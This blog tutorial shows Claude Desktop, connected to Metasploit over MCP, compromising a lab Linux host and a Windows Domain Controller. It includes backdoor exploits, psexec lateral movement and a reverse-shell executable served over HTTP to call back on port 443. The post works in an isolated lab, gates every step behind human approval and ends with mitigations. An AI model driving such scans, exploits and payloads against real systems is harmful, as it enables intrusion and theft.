AI-Powered Penetration Testing with Metasploit

June 6, 2026July 17, 2026 by raj

Overview

This article documents an end-to-end agentic penetration test. Claude Desktop, connected to the Metasploit Framework through the Model Context Protocol (MCP), turns plain-English tasks into real offensive actions. The assistant scans the network, selects and launches exploit modules, manages sessions, runs post-exploitation, and even builds and delivers a custom payload — first compromising a vulnerable Linux host and then pivoting to a Windows Domain Controller. Metasploit performs the work; a permission gate keeps a human in control of every offensive step; and every action targets a private, isolated lab the author owns.

The walkthrough proceeds in three movements: building the MCP bridge, compromising the Linux target, and pivoting to the Domain Controller. It closes with concrete mitigation strategies and a forward-looking conclusion on what agentic tooling means for both offence and defence.

Introduction
Lab Environment
Building the Metasploit MCP Bridge
Installing the Metasploit MCP Server
Starting PostgreSQL and the MSF RPC Daemon
Adding the Claude Desktop Repository Key
Registering the Repository and Refreshing APT
Installing Claude Desktop
Opening Claude Desktop Settings
Locating the Local MCP Server Panel
Locating the Configuration File
Reviewing the Default Configuration
Referencing the MetasploitMCP Template
Registering the Metasploit Server
Confirming the Server Is Running
Scenario 1
- Compromising the Linux Target
- Tasking Claude to Scan the Target
- Initial Port Discovery
- The Complete Port Map
- Exploiting the vsftpd Backdoor
- Gaining a Root Shell
- Listing the Active Session
- Post-Exploitation: Enumerating SMB Shares
- Chaining a Second Exploit: UnrealIRCd
- Pivoting to the Domain Controller
- Consolidating the Foothold
- Reviewing the Metasploit Toolset
Scenario 2
- Scanning the Domain Controller
- Surveying SMB Exploits
- Supplying the Target
- Supplying SMB Credentials
- Gaining a SYSTEM Session
- Confirming SYSTEM on the DC
- Surveying Post-Exploitation Modules
- Enumerating Domain Controller Shares
Scenario 3
- Generate Payload
- Choosing the Output Format
- Setting the Listener Host
- Setting the Listener Port
- Generating the Payload
- Hosting the Payload
- Starting the Handler
- List Active Sessions
Mitigation Strategies
Conclusion

Introduction

The Model Context Protocol lets Claude Desktop reach beyond conversation and calls external tools directly. Pointed at a Metasploit MCP server, the assistant becomes an operator’s force multiplier: it interprets terse instructions, recalls exact module syntax, chains steps, and reports results in context — collapsing much of the friction that normally slows an engagement.

This piece demonstrates that workflow in full. Rather than typing Metasploit commands by hand, the operator issues goals such as “scan 192.168.1.8” or “exploit port 21,” and the assistant proposes and executes the corresponding actions. The result is a vivid look at how natural-language interfaces are reshaping practical security testing. Because these techniques grant real control over real systems, they must only ever run against assets you are explicitly authorised to test.

Lab Environment

The engagement unfolds on a single isolated segment, 192.168.1.0/24, built in VMware. A Kali Linux machine serves as the attacker and hosts both Claude Desktop and the Metasploit Framework. Two victims complete the picture: an intentionally vulnerable Metasploitable 2 Linux box and a Windows Server 2019 Active Directory Domain Controller. The hosts and their roles are summarised below.

Architecturally, Claude Desktop communicates with msfrpcd via the MCP bridge, and Metasploit reaches the targets across the lab segment. Nothing in this environment is connected to a production network.

Building the Metasploit MCP Bridge

Before any offensive action, we connect the assistant to Metasploit. The following steps install the bridge, start the framework’s services, deploy Claude Desktop, and register the server.

Installing the Metasploit MCP Server

We will first install the bridge that exposes Metasploit’s RPC interface as MCP tools such as run_exploit, run_post_module, and list_active_sessions.

sudo apt install metasploitmcp

Starting PostgreSQL and the MSF RPC Daemon

Metasploit relies on PostgreSQL, and the bridge communicates through msfrpcd. We start the database, then launch the RPC daemon bound to localhost; it backgrounds itself and reports a live PID.

sudo service postgresql start
msfrpcd -P <msf-password> -S -a 127.0.0.1 -p 55553

Installing Claude Desktop on Kali Linux

Kali Linux is Debian-based, so an amd64 Debian package is appropriate for a standard 64-bit Intel/AMD Kali installation. From the release Assets section, download the amd64 .deb package shown in the screenshot.

claude-desktop_1.21459.0_amd64.deb

Open a terminal and move to the directory containing the downloaded Debian package. If the browser saved the file in Downloads, run:

cd Downloads

Install the package with dpkg:

sudo dpkg -i claude-desktop-unofficial_1.21459.0-3.2.1_amd64.deb

The installation process unpacks the package, configures Claude Desktop, updates the desktop database, and sets the required chrome-sandbox permissions. A successful installation returns you to the terminal prompt without a fatal error.

Opening Claude Desktop Settings

After launching the client, we open the account menu and select Settings to reach the configuration panels.

Locating the Local MCP Server Panel

In Settings, we open the Developer tab to access Local MCP servers, then click Edit Config to open the JSON file that defines them.

Locating the Configuration File

Edit Config points to claude_desktop_config.json in the Claude profile directory, which we open in a text editor.

~/.config/Claude/claude_desktop_config.json

Reviewing the Default Configuration

The file initially holds only client preferences — note the remoteToolsDeviceName “kali”. We will add an mcpServers block alongside these settings.

Referencing the MetasploitMCP Template

The MetasploitMCP project page supplies a template mcpServers block specifying the command, arguments, and an MSF_PASSWORD variable, which we adapt to our installation. Metasploit MCP Configuration

Registering the Metasploit Server

We edit the configuration: the command becomes metasploitmcp, the transport is stdio, and MSF_PASSWORD carries the same password given to msfrpcd.

{
"mcpServers": {
"metasploit": {
"command": "metasploitmcp",
"args": [

"--transport",
"stdio"
],
"env": {
"MSF_PASSWORD": "Ignite@987"
}
}
}
}

Confirming the Server Is Running

Back in Settings, the Local MCP servers panel lists Metasploit with a green running badge — the bridge is live, and the Metasploit tools are now available to the assistant.

Scenario 1

Compromising the Linux Target

With the bridge live, we turn the assistant on the Metasploitable 2 host at 192.168.1.8, moving from reconnaissance to a root shell using only plain-language tasks.

Tasking Claude to Scan the Target

We issue a deliberately terse task — no flags, no module names. The assistant must work out the method itself.

scan 192.168.1.8

Initial Port Discovery

Claude reasons about its constraints — the sandbox lacks raw-socket Nmap — proposes alternatives, runs a scan through the connector, and returns the first open ports: FTP, SSH, Telnet, SMTP, HTTP, SMB, MySQL, and VNC.

The Complete Port Map

Asked for a full scan, the assistant returns all 31 open ports and annotates them with security context — flagging vsftpd 2.3.4, the Samba usermap_script weakness, distccd RCE, the ingreslock backdoor, and an UnrealIRCd backdoor.

complete port scan

Exploiting the vsftpd Backdoor

We escalate from looking to acting. Claude maps the request to the module unix/ftp/vsftpd_234_backdoor, sets RHOSTS, and requests run_exploit. A permission gate halts execution until a human explicitly approves.

exploit port 21

Gaining a Root Shell

On approval, the backdoor triggers and a Meterpreter session open as root on metasploitable.localdomain, tunnelled from Kali at 192.168.1.17.

Listing the Active Session

We confirm the foothold. The list_active_sessions tool reports one live root Meterpreter session, ready for post-exploitation.

list_active_sessions

Post-Exploitation: Enumerating SMB Shares

Claude runs an SMB auxiliary module, correctly recognising smb_enumshares as an auxiliary rather than a post module and returns the share list — including a world-writable tmp share — noting Samba 3.0.20 is vulnerable to usermap_script (CVE-2007-2447).

run_post_module scanner/smb/smb_enumshares

Chaining a Second Exploit: UnrealIRCd

Directed at another flagged service, the assistant launches unix/irc/unreal_ircd_3281_backdoor and creates a second session — demonstrating multi-exploit chaining — while candidly noting a session-persistence quirk in the RPC layer.

run exploit on port 6667

Pivoting to the Domain Controller

With the Linux host owned, we turn to the prize of the lab — the Windows Domain Controller at 192.168.1.11 — and drive the assistant from reconnaissance to a standing SYSTEM session.

Consolidating the Foothold

We begin by confirming our two existing footholds on the Linux host: a root Meterpreter session via vsftpd and a command shell via UnrealIRCd — a stable base from which to pivot.

list_active_sessions

Reviewing the Metasploit Toolset

We ask the assistant to enumerate every Metasploit action exposed over MCP. The reference spans the full lifecycle — list_exploits, run_exploit, run_post_module, generate_payload, start_listener, and session management.

all commands

Scenario 2

Scanning the Domain Controller

Pointed at 192.168.1.11, the assistant returns the open ports and classifies them: Kerberos (88, 464), LDAP (389, 636), SMB (445), DNS (53), and RPC — the classic signature of a Windows Domain Controller.

port scan 192.168.1.11

Surveying SMB Exploits

Asked for SMB exploits on port 445, the assistant lists EternalBlue, MS08-067, SMBGhost, and others, and flags credential-based windows/smb/psexec as the clean path — because we already hold valid administrator credentials for this lab.

list_exploits windows port 445

Supplying the Target

The assistant gathers parameters interactively rather than guessing. It first asks for RHOSTS; we select the Domain Controller at 192.168.1.11.

RHOSTS → 192.168.1.11.

Supplying SMB Credentials

Because psexec authenticates rather than exploits a memory bug, it needs a valid account. We provide the known lab administrator credentials via the free-text option.

SMBUser: administrator
SMBPass: <lab-password>

Gaining a SYSTEM Session

The assistant runs psexec, and a session opens — a windows/meterpreter/reverse_tcp payload on

Confirming SYSTEM on the DC

Running sysinfo is decisive: we are NT AUTHORITY\SYSTEM on a machine named DC — the highest privilege on the host.

sysinfo

Surveying Post-Exploitation Modules

We ask which post modules are worth running. The assistant groups the most useful Windows modules by purpose: gather/recon (hashdump, enum_shares, credential_collector), privilege escalation, and persistence.

list post module

Enumerating Domain Controller Shares

When a post module needs a session that has since dropped, the assistant explains the timeout and offers the exact console sequence to re-establish it — a transparent fallback that keeps the operator in control.

run post/windows/gather/enum_shares

An SMB share enumeration returns ADMIN$, C$, IPC$, and the tell-tale NETLOGON and SYSVOL — confirming a standard, clean Domain Controller

Scenario 3

Generate Payload

Beyond live exploitation, the assistant can build a standalone payload. We invoke generate_payload and select windows/meterpreter/reverse_tcp

Choosing the Output Format

Asked for the output format — exe, ps1, dll, or raw — we chose a standalone Windows executable.

Selection: exe

Setting the Listener Host

A reverse payload must know where to call back. The assistant prompts for LHOST; we supply the Kali address 192.168.1.17.

Selection: LHOST → 192.168.1.17.

Setting the Listener Port

For LPORT we choose 443 — a port that blends with HTTPS and is rarely blocked outbound.

Selection: LPORT → 443.

Generating the Payload

The assistant produces the executable and reports the result: a 7,168-byte file under /home/kali/payloads/ with the embedded LHOST and LPORT, and a reminder to start a listener first.

Hosting the Payload

To deliver the file we drop to the Kali terminal, confirm the executable, and serve it over HTTP. The log line shows the Domain Controller at 192.168.1.11 downloading it.

cd payloads
ls -al
python3 -m http.server

Starting the Handler

Back in the assistant, we start the matching listener with start_listener. Claude requests the action — specifying the payload, lhost, and lport 443 — and the permission gate again requires explicit approval.

start_listener

List Active Sessions

When the delivered executable runs, it calls back and a fresh Meterpreter session appears — from 192.168.1.11 as IGNITE\administrator @ DC, over our 192.168.1.17:443 listener. The full chain, from scan to standing access, was driven entirely by conversation.

list_active_sessions

Mitigation Strategies

Every weakness exploited here is well understood and entirely defensible. The first line of defence is dealing with the legacy services that made these hosts exploitable in the first place. Software like vsftpd 2.3.4, UnrealIRCd, and Samba 3.0.x is long past end-of-life and should be patched or retired outright; any service that isn’t actively needed should be removed entirely. Backing this up with continuous vulnerability management ensures that known-bad versions are caught as they reappear, rather than lingering until an attacker finds them.

Closely related is the problem of broad service exposure on the host. Reducing the attack surface means segmenting the network so that a single compromised machine can’t freely reach everything else, applying strict ingress and egress firewall rules, and closing every port that doesn’t serve a documented, justified purpose. A port that doesn’t need to be open is simply one less thing an attacker can probe.

The most damaging step in the engagement was credential-based lateral movement to the domain controller via psexec, and the mitigations here centre on identity. Administrators should enforce strong, unique passwords and adopt a tiered-administration model so that high-privilege credentials are never exposed on lower-trust systems. Deploying LAPS to manage local administrator passwords and restricting which accounts are permitted to authenticate to domain controllers at all sharply limits how far stolen credentials can travel.

SMB weaknesses and exposed admin shares deserve their own attention. Requiring SMB signing, disabling the obsolete SMBv1 protocol, removing any world-writable shares, and applying least privilege to all share permissions together close off one of the most common avenues for both lateral movement and data access.

On the endpoint side, the goal is to disrupt payload delivery and reverse shells — for example, an EXE hosted over HTTP that calls back on port 443. Endpoint detection and response with behavioural analytics, application allow-listing and blocking of unsigned binaries all raise the cost of execution, while alerting on anomalous outbound connections (including traffic riding on 443, where malicious call-backs often hide in plain sight) helps catch what slips through.

Finally, the engagement itself was driven by agentic tooling, and that capability cuts both ways. Defensively, organisations should keep a human in the loop as an approval gate rather than letting an agent act autonomously, log and audit every MCP tool call, and restrict which connectors are enabled in the first place. Agent output should be treated as untrusted by default — and, importantly, the same automation that powers offensive testing can be turned toward the blue team to drive detection engineering and continuous validation.

Layered together, these controls break the chain at multiple points: an attacker who cannot reach a vulnerable service, recover a privileged credential, move laterally unnoticed, or land a payload cannot reproduce the outcome shown here.

Conclusion

In a single connected workflow, an AI assistant moved from an empty prompt to a root shell on a Linux host and a SYSTEM session on a Domain Controller — scanning, exploiting, enumerating, and delivering a payload, all through natural language. Metasploit performed the exploitation; the assistant supplied the orchestration and recall; and a human approved every offensive step.

That balance is the real lesson. Agentic tooling compresses an entire engagement into a conversation and lowers the skill floor for offence — but the very same integration can also automate detection, validation, and reporting for defenders. The advantage will go to whoever adopts it more deliberately. Used responsibly, with authorisation and a human firmly in the loop, an assistant like this is a powerful ally; used carelessly, it is a warning. The choice, as always, rests with the operator.